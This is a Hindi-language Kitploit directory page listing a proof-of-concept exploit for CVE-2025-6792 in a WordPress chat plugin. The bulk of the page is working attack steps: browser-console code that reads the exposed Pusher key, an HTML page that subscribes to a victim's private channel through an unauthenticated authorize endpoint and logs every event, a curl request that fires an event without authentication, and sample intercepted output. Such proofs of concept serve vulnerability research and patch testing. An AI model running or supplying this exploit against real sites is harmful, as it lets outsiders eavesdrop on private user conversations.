Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-6792 — CVE-2025-6792 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो एक WordPress प्लगइन में अनधिकृत Pusher चैनल सब्सक्रिप्शन और ईवेंट जासूसी को उजागर क्रेडेंशियल्स और अप्रमाणित API एंडपॉइंट्स के माध्यम से प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/jfriedli/cve-2025-6792
टोहीशोषणवेब एप्लिकेशन शोषणएपीआई सुरक्षा परीक्षणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubjfriedli/cve-2025-6792

CVE-2025-6792

CVE-2025-6792 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो एक WordPress प्लगइन में अनधिकृत Pusher चैनल सब्सक्रिप्शन और ईवेंट जासूसी को उजागर क्रेडेंशियल्स और अप्रमाणित API एंडपॉइंट्स के माध्यम से प्रदर्शित करता है।

रिपॉजिटरी देखें
15 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शोषण: अनधिकृत पुशर चैनल सब्सक्रिप्शन (छिपकर सुनना)

1) पुशर क्रेडेंशियल प्राप्त करें (ब्राउज़र कंसोल से)

root@kitploit:~
console.log(
  window.wpguppy_scripts_vars.pusherKey,
  window.wpguppy_scripts_vars.pusherCluster
);

2) पीड़ित के निजी चैनल की सदस्यता लें

root@kitploit:~
<!doctype html>
<html>
<head>
  <meta charset="utf-8">
  <title>Pusher Eavesdrop Test</title>
  <script src="https://js.pusher.com/7.4/pusher.min.js"></script>
</head>
<body>
  <h1>Listening on private-user-5</h1>
  <pre id="log"></pre>

  <script>
    const log = msg => {
      const p = document.createElement('div');
      p.textContent = msg;
      document.getElementById('log').appendChild(p);
    };

    const pusher = new Pusher("PUSHER_KEY", {
      cluster: "PUSHER_CLUSTER",
      authEndpoint: "http://localhost/wordpress/wp-json/guppylite/v2/channel-authorize"
    });

    const channel = pusher.subscribe("private-user-5");

    channel.bind_global((event, data) => {
      log(`Event: ${event} → ${JSON.stringify(data)}`);
    });

    pusher.connection.bind('error', err => {
      log(`Pusher error: ${err.error ? err.error.data : err}`);
    });

    log("Waiting for events...");
  </script>
</body>
</html>

3) एक घटना ट्रिगर करें (अप्रमाणित)

root@kitploit:~
curl -i -X POST "http://localhost/wordpress/?rest_route=/guppylite/v2/user-typing" \
  -H "Content-Type: application/json" \
  -d '{
    "chatId": "5_1",
    "chatType": 1,
    "text": "typing...",
    "userName": "Alice",
    "senderId": 5
  }'

4) इंटरसेप्ट किए गए डेटा का निरीक्षण करें

root@kitploit:~
Event: isTyping → {
  "chatId":"5_1",
  "chatType":1,
  "text":"typing...",
  "userName":"Alice",
  "senderId":5
}
टूल डाउनलोड करें